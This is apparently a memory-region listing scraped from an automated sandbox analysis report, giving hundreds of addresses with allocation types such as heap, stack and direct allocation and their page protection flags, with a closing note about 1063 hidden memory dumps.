page read and write
C000068000
direct allocation
page read and write
1AA49940000
trusted library allocation
page read and write
7FFD9BC20000
trusted library allocation
page read and write
19C747B9000
heap
page read and write
1405FED2000
trusted library allocation
page read and write
7FFD9BD06000
trusted library allocation
page read and write
1AA4999A000
heap
page read and write
C000006000
direct allocation
page read and write
1AA4999A000
heap
page read and write
C000318000
direct allocation
page read and write
C000085000
direct allocation
page read and write
19C742A9000
heap
page read and write
C000168000
direct allocation
page read and write
7FFD9BC90000
trusted library allocation
page read and write
C00005C000
direct allocation
page read and write
C00057C000
direct allocation
page read and write
1AA49F02000
heap
page read and write
1AA49997000
heap
page read and write
7B19487000
stack
page read and write
2563A346000
trusted library allocation
page read and write
C00009C000
direct allocation
page read and write
25636ABE000
heap
page read and write
25650CE0000
heap
page execute and read and write
CFBA6FF000
stack
page read and write
1405FD40000
trusted library allocation
page read and write
2976C7EF000
heap
page read and write
19C742ED000
heap
page read and write
1AA498A7000
heap
page read and write
C000316000
direct allocation
page read and write
19C7617D000
heap
page read and write
C000302000
direct allocation
page read and write
7FF684967000
unkown
page read and write
C00054A000
direct allocation
page read and write
C000552000
direct allocation
page read and write
C0002A8000
direct allocation
page read and write
C00016E000
direct allocation
page read and write
19C76172000
heap
page read and write
AA291FD000
stack
page read and write
19C742D6000
heap
page read and write
1AA4B85D000
heap
page read and write
25650D18000
heap
page read and write
1FAF2888000
heap
page read and write
C000320000
direct allocation
page read and write
19C74430000
heap
page read and write
19C74791000
heap
page read and write
C00041C000
direct allocation
page read and write
29745A68000
heap
page read and write
1AA4999B000
heap
page read and write
C000558000
direct allocation
page read and write
29918F70000
heap
page read and write
2563A033000
trusted library allocation
page read and write
19C747AF000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
C000540000
direct allocation
page read and write
19C74885000
heap
page read and write
1FAF28CD000
heap
page read and write
C0001D6000
direct allocation
page read and write
C000384000
direct allocation
page read and write
19C747A0000
heap
page read and write
C000056000
direct allocation
page read and write
C00000E000
direct allocation
page read and write
19C7488A000
heap
page read and write
21DE019B000
heap
page read and write
1AA49836000
heap
page read and write
21DDFB20000
heap
page read and write
21DDFB78000
heap
page read and write
1AA49867000
heap
page read and write
C00005A000
direct allocation
page read and write
1AA4989F000
heap
page read and write
1406E60D000
trusted library allocation
page read and write
1AA49855000
heap
page read and write
7FFD9B993000
trusted library allocation
page execute and read and write
21DE1B2D000
heap
page read and write
7FFD9BB92000
trusted library allocation
page read and write
C0003BE000
direct allocation
page read and write
C00042E000
direct allocation
page read and write
C00002A000
direct allocation
page read and write
2976C803000
heap
page read and write
19C76176000
heap
page read and write
C000241000
direct allocation
page read and write
C000138000
direct allocation
page read and write
1FAF2A20000
heap
page read and write
1AA49940000
trusted library allocation
page read and write
21DDFBAB000
heap
page read and write
29918FE0000
heap
page read and write
C00024E000
direct allocation
page read and write
21DE01CC000
heap
page read and write
1FAF28CD000
heap
page read and write
1FAF28CD000
heap
page read and write
C000022000
direct allocation
page read and write
7FF6845D3000
unkown
page write copy
C000560000
direct allocation
page read and write
19C74887000
heap
page read and write
25636CF0000
trusted library allocation
page read and write
2976C80D000
heap
page read and write
1AA49834000
heap
page read and write
C000328000
direct allocation
page read and write
25650AC0000
heap
page read and write
25650AB0000
heap
page execute and read and write
21DE019A000
heap
page read and write
C000350000
direct allocation
page read and write
25636D00000
heap
page read and write
C00000C000
direct allocation
page read and write
21DDFBF2000
heap
page read and write
21DDFBC4000
heap
page read and write
1405F942000
trusted library allocation
page read and write
C000332000
direct allocation
page read and write
7FFD9B9AB000
trusted library allocation
page read and write
1AA49876000
heap
page read and write
21DE0110000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page execute and read and write
21DE1B26000
heap
page read and write
19C742A5000
heap
page read and write
C000286000
direct allocation
page read and write
1FAF28A6000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1405C5E0000
trusted library allocation
page read and write
AA293FF000
stack
page read and write
1AA49900000
heap
page read and write
19C74780000
heap
page read and write
21DDFBB2000
heap
page read and write
2976C7F1000
heap
page read and write
21DE0192000
heap
page read and write
1405C6D0000
trusted library allocation
page read and write
4F0047E000
stack
page read and write
2976C811000
heap
page read and write
4F0037E000
stack
page read and write
C00053C000
direct allocation
page read and write
1AA49842000
heap
page read and write
29919005000
heap
page read and write
C000049000
direct allocation
page read and write
25650AF6000
heap
page read and write
21DDFB67000
heap
page read and write
C00007A000
direct allocation
page read and write
1AA49838000
heap
page read and write
1405FA0A000
trusted library allocation
page read and write
25636A60000
heap
page read and write
3EA507F000
stack
page read and write
C00000A000
direct allocation
page read and write
C0001FE000
direct allocation
page read and write
297458E0000
heap
page read and write
C00017E000
direct allocation
page read and write
21DDFBB1000
heap
page read and write
2FA027F000
stack
page read and write
7FF6845A7000
unkown
page write copy
25648A74000
trusted library allocation
page read and write
1405C750000
heap
page read and write
297456FB000
heap
page read and write
FE5137F000
stack
page read and write
19C74210000
heap
page read and write
21DE01C9000
heap
page read and write
1AA4B85E000
heap
page read and write
2976C810000
heap
page read and write
21DE019A000
heap
page read and write
C000284000
direct allocation
page read and write
1AA49840000
heap
page read and write
21DDFC80000
heap
page read and write
25650B13000
heap
page read and write
2563A2BF000
trusted library allocation
page read and write
C000044000
direct allocation
page read and write
C00016C000
direct allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
21DDFBF3000
heap
page read and write
2FA05F9000
stack
page read and write
C000098000
direct allocation
page read and write
14076500000
heap
page read and write
19C7478F000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
1AA4986A000
heap
page read and write
AA29DFF000
stack
page read and write
1405C460000
heap
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
FDDB0CF000
stack
page read and write
C0002CA000
direct allocation
page read and write
C000382000
direct allocation
page read and write
C000134000
direct allocation
page read and write
21DDFBEC000
heap
page read and write
C00054E000
direct allocation
page read and write
19C742CF000
heap
page read and write
C0001E8000
direct allocation
page read and write
C00042B000
direct allocation
page read and write
1AA4B85E000
heap
page read and write
C0001DE000
direct allocation
page read and write
C000051000
direct allocation
page read and write
25636B48000
heap
page read and write
256386B0000
heap
page read and write
C000160000
direct allocation
page read and write
25636AE5000
heap
page read and write
C000076000
direct allocation
page read and write
7FFD9BB30000
trusted library allocation
page read and write
19C742A6000
heap
page read and write
21DE1B24000
heap
page read and write
29918F40000
heap
page read and write
21DDFBA2000
heap
page read and write
FE512FE000
stack
page read and write
29745A60000
heap
page read and write
19C747B0000
heap
page read and write
7FF685597000
unkown
page readonly
19C74887000
heap
page read and write
C000278000
direct allocation
page read and write
7FFD9BD20000
trusted library allocation
page read and write
1406E4C7000
trusted library allocation
page read and write
2976C80B000
heap
page read and write
21DDFBC8000
heap
page read and write
2976AC79000
direct allocation
page read and write
C000096000
direct allocation
page read and write
C000444000
direct allocation
page read and write
1405C440000
heap
page read and write
C000264000
direct allocation
page read and write
19C741C0000
heap
page read and write
14076560000
heap
page read and write
1AA4B851000
heap
page read and write
1AA4B854000
heap
page read and write
1AA4985B000
heap
page read and write
1AA49860000
heap
page read and write
1AA4B840000
heap
page read and write
19C74270000
heap
page read and write
C000562000
direct allocation
page read and write
C000322000
direct allocation
page read and write
1AA49840000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
7FFD9BB52000
trusted library allocation
page read and write
1FAF2880000
heap
page read and write
19C742C6000
heap
page read and write
1AA49A65000
heap
page read and write
7FF6845EC000
unkown
page readonly
C000120000
direct allocation
page read and write
1AA4989B000
heap
page read and write
1AA49F0E000
heap
page read and write
1AA49834000
heap
page read and write
7FFD9BA76000
trusted library allocation
page execute and read and write
2976AC70000
direct allocation
page read and write
2F9FF92000
stack
page read and write
1AA49A60000
heap
page read and write
21DE0193000
heap
page read and write
2563A0FE000
trusted library allocation
page read and write
C000180000
direct allocation
page read and write
29745970000
direct allocation
page read and write
1AA4985D000
heap
page read and write
C000245000
direct allocation
page read and write
2976C80E000
heap
page read and write
1AA4999E000
heap
page read and write
21DE01D3000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
C0001C6000
direct allocation
page read and write
1AA4989D000
heap
page read and write
14076737000
heap
page read and write
2976C79B000
direct allocation
page read and write
25638503000
trusted library allocation
page read and write
C00011A000
direct allocation
page read and write
7FFD9BA96000
trusted library allocation
page execute and read and write
2991902C000
heap
page read and write
21DE0197000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
FE50EFB000
stack
page read and write
21DDFBE8000
heap
page read and write
C000144000
direct allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
2976C7A0000
direct allocation
page read and write
19C742C4000
heap
page read and write
25636AAE000
heap
page read and write
19C74435000
heap
page read and write
C00018C000
direct allocation
page read and write
1AA4986F000
heap
page read and write
21DE1B2D000
heap
page read and write
7FF6845D4000
unkown
page read and write
25638A01000
trusted library allocation
page read and write
C000272000
direct allocation
page read and write
2FA0779000
stack
page read and write
1AA4B850000
heap
page read and write
1405C4A0000
heap
page read and write
C000280000
direct allocation
page read and write
C00012A000
direct allocation
page read and write
21DE01D2000
heap
page read and write
19C742D9000
heap
page read and write
C00022A000
direct allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
C000247000
direct allocation
page read and write
140765FD000
heap
page read and write
29745918000
direct allocation
page read and write
2FA04FE000
stack
page read and write
19C7488B000
heap
page read and write
2FA03FD000
stack
page read and write
14076727000
heap
page read and write
1AA49EF0000
heap
page read and write
7B1997E000
stack
page read and write
19C74880000
heap
page read and write
21DE01AC000
heap
page read and write
1AA4987A000
heap
page read and write
C0000FA000
direct allocation
page read and write
25636AA6000
heap
page read and write
21DDFB87000
heap
page read and write
21DDFBA2000
heap
page read and write
C000155000
direct allocation
page read and write
1AA49898000
heap
page read and write
C0003D4000
direct allocation
page read and write
25650B6D000
heap
page read and write
1AA4999A000
heap
page read and write
25651000000
heap
page read and write
C000239000
direct allocation
page read and write
7FF68496E000
unkown
page readonly
C0000F6000
direct allocation
page read and write
19C742C1000
heap
page read and write
1AA49855000
heap
page read and write
25650B15000
heap
page read and write
1AA49851000
heap
page read and write
21DE019E000
heap
page read and write
1AA49997000
heap
page read and write
1AA49840000
heap
page read and write
21DE01A7000
heap
page read and write
C000420000
direct allocation
page read and write
1AA4B864000
heap
page read and write
21DDFB40000
trusted library allocation
page read and write
21DDFBA5000
heap
page read and write
1405C52A000
heap
page read and write
21DDFBF3000
heap
page read and write
C00010E000
direct allocation
page read and write
C000192000
direct allocation
page read and write
2976C811000
heap
page read and write
C000427000
direct allocation
page read and write
19C76184000
heap
page read and write
21DE1B2D000
heap
page read and write
2976C835000
heap
page read and write
1AA49994000
heap
page read and write
CFBA67E000
stack
page read and write
C00033C000
direct allocation
page read and write
19C74793000
heap
page read and write
AA297FC000
stack
page read and write
1AA4999E000
heap
page read and write
FE50FFF000
stack
page read and write
25650AED000
heap
page read and write
1405C4E9000
heap
page read and write
2976C7F9000
heap
page read and write
19C7443B000
heap
page read and write
21DDFB67000
heap
page read and write
7FFD9B9B2000
trusted library allocation
page read and write
C000041000
direct allocation
page read and write
1AA49853000
heap
page read and write
2976C80F000
heap
page read and write
1AA49993000
heap
page read and write
21DDFBC4000
heap
page read and write
21DDFBBA000
heap
page read and write
C000018000
direct allocation
page read and write
2976C7FB000
heap
page read and write
25650D50000
heap
page read and write
2991902C000
heap
page read and write
19C7617D000
heap
page read and write
1AA4988A000
heap
page read and write
21DE019E000
heap
page read and write
7FF6841C0000
unkown
page readonly
2974574D000
heap
page read and write
25650B8F000
heap
page read and write
C000324000
direct allocation
page read and write
2976C80B000
heap
page read and write
2976C810000
heap
page read and write
7FFD9BC80000
trusted library allocation
page read and write
2976C7E3000
heap
page read and write
C00001E000
direct allocation
page read and write
7FFD9B9CB000
trusted library allocation
page read and write
1405FF9C000
trusted library allocation
page read and write
C00051A000
direct allocation
page read and write
1405C51D000
heap
page read and write
C00046A000
direct allocation
page read and write
21DE01D5000
heap
page read and write
C000429000
direct allocation
page read and write
C00014C000
direct allocation
page read and write
1AA49853000
heap
page read and write
19C747B9000
heap
page read and write
C00005E000
direct allocation
page read and write
C000400000
direct allocation
page read and write
21DDFBB2000
heap
page read and write
C000364000
direct allocation
page read and write
1AA49EFF000
heap
page read and write
C000066000
direct allocation
page read and write
2976C7E7000
heap
page read and write
21DE0194000
heap
page read and write
19C742C1000
heap
page read and write
1AA4985B000
heap
page read and write
19C742E1000
heap
page read and write
1AA4985D000
heap
page read and write
19C741E0000
trusted library allocation
page read and write
C000250000
direct allocation
page read and write
21DE01C9000
heap
page read and write
21DDFBC4000
heap
page read and write
7FFD9B992000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page execute and read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
C000008000
direct allocation
page read and write
1AA49F29000
heap
page read and write
19C742C1000
heap
page read and write
3EA4EFF000
stack
page read and write
C00004F000
direct allocation
page read and write
21DDFB40000
trusted library allocation
page read and write
1AA49862000
heap
page read and write
C0002BB000
direct allocation
page read and write
C0002A4000
direct allocation
page read and write
21DDFC8E000
heap
page read and write
19C74282000
heap
page read and write
1AA49A6E000
heap
page read and write
21DDFC90000
trusted library allocation
page read and write
1AA49F05000
heap
page read and write
2976C810000
heap
page read and write
1AA49862000
heap
page read and write
21DE01CA000
heap
page read and write
2976C7F1000
heap
page read and write
C00017C000
direct allocation
page read and write
19C741A0000
heap
page read and write
2976C7E3000
heap
page read and write
21DDFBAD000
heap
page read and write
21DDFB62000
heap
page read and write
C0001B6000
direct allocation
page read and write
2FA047F000
stack
page read and write
C0002F2000
direct allocation
page read and write
21DDFBAB000
heap
page read and write
21DDFBBD000
heap
page read and write
1405E311000
trusted library allocation
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
25650B62000
heap
page read and write
C00003F000
direct allocation
page read and write
1405C690000
heap
page read and write
2976C803000
heap
page read and write
7FF684961000
unkown
page read and write
FDDA3F6000
stack
page read and write
1AA49817000
heap
page read and write
2976C812000
heap
page read and write
25638559000
heap
page read and write
1406E320000
trusted library allocation
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
19C7617D000
heap
page read and write
14076581000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
25638500000
trusted library allocation
page read and write
C000053000
direct allocation
page read and write
7FF68536E000
unkown
page readonly
C00001C000
direct allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
C000058000
direct allocation
page read and write
19C76184000
heap
page read and write
21DE01D9000
heap
page read and write
C0003D6000
direct allocation
page read and write
2976AC75000
direct allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
29745749000
heap
page read and write
2976C803000
heap
page read and write
1AA4B853000
heap
page read and write
C000146000
direct allocation
page read and write
25636AA2000
heap
page read and write
2976C81A000
heap
page read and write
25650D10000
heap
page read and write
19C742AF000
heap
page read and write
29745A0B000
direct allocation
page read and write
1AA49874000
heap
page read and write
2976C80B000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1AA49992000
heap
page read and write
1FAF28A6000
heap
page read and write
19C742E1000
heap
page read and write
7FF6845E3000
unkown
page write copy
1AA49F0E000
heap
page read and write
7FFD9B99D000
trusted library allocation
page execute and read and write
140765D0000
heap
page read and write
1FAF28CD000
heap
page read and write
FDDA17D000
stack
page read and write
1AA49940000
trusted library allocation
page read and write
C000216000
direct allocation
page read and write
C000126000
direct allocation
page read and write
C000080000
direct allocation
page read and write
C0001E6000
direct allocation
page read and write
21DDFBA2000
heap
page read and write
C0002DE000
direct allocation
page read and write
C000226000
direct allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
1AA49995000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
AA28BFC000
stack
page read and write
29745A6A000
heap
page read and write
1405C75E000
heap
page read and write
19C742D9000
heap
page read and write
CFBA77F000
stack
page read and write
29919018000
heap
page read and write
19C742C4000
heap
page read and write
1AA49855000
heap
page read and write
C000014000
direct allocation
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
7FFD9BA66000
trusted library allocation
page read and write
1AA49F19000
heap
page read and write
21DE1B10000
heap
page read and write
CFBA3FE000
stack
page read and write
21DE01B8000
heap
page read and write
1AA49897000
heap
page read and write
1AA49F08000
heap
page read and write
21DDFB78000
heap
page read and write
19C742D4000
heap
page read and write
2563A68C000
trusted library allocation
page read and write
2976C804000
heap
page read and write
25636D20000
heap
page read and write
19C747A0000
heap
page read and write
C000210000
direct allocation
page read and write
19C747A0000
heap
page read and write
C000338000
direct allocation
page read and write
C00043C000
direct allocation
page read and write
2563A5C7000
trusted library allocation
page read and write
21DE01AF000
heap
page read and write
19C742D6000
heap
page read and write
19C747A9000
heap
page read and write
21DDFBFB000
heap
page read and write
1AA4989B000
heap
page read and write
21DE0195000
heap
page read and write
1AA4B864000
heap
page read and write
C000088000
direct allocation
page read and write
21DE1B34000
heap
page read and write
C000016000
direct allocation
page read and write
2FA13CE000
stack
page read and write
21DE1B22000
heap
page read and write
21DDFBB3000
heap
page read and write
1AA498A8000
heap
page read and write
C000442000
direct allocation
page read and write
2976C7F9000
heap
page read and write
21DDFA20000
heap
page read and write
1AA49720000
heap
page read and write
FDDA0FE000
stack
page read and write
1405C695000
heap
page read and write
2976C7FB000
heap
page read and write
1AA49863000
heap
page read and write
C000102000
direct allocation
page read and write
C00031E000
direct allocation
page read and write
140764F0000
heap
page execute and read and write
CFBA7FE000
stack
page read and write
1AA49970000
heap
page read and write
1AA498A9000
heap
page read and write
FE5127F000
stack
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
2976C7E7000
heap
page read and write
2976C810000
heap
page read and write
1AA49F19000
heap
page read and write
7FF68496E000
unkown
page readonly
7FFD9BBF0000
trusted library allocation
page read and write
1AA49855000
heap
page read and write
7FF684919000
unkown
page read and write
1407631A000
heap
page read and write
FDDA5FE000
stack
page read and write
2976C7E7000
heap
page read and write
21DDFBB0000
heap
page read and write
C00037A000
direct allocation
page read and write
2976C7D0000
heap
page read and write
C000132000
direct allocation
page read and write
1405C5CA000
heap
page read and write
7FF6841C1000
unkown
page execute read
C00053A000
direct allocation
page read and write
21DE01A8000
heap
page read and write
1AA49897000
heap
page read and write
C000546000
direct allocation
page read and write
29745A65000
heap
page read and write
21DDFC90000
trusted library allocation
page read and write
1405FBCA000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
1AA49833000
heap
page read and write
7FFD9BC20000
trusted library allocation
page read and write
C000425000
direct allocation
page read and write
29918F50000
heap
page read and write
1AA498A4000
heap
page read and write
C00024A000
direct allocation
page read and write
2976C7D6000
heap
page read and write
C000396000
direct allocation
page read and write
2976C835000
heap
page read and write
FE50F7F000
stack
page read and write
1AA49F19000
heap
page read and write
There are 1063 hidden memdumps, click here to show them.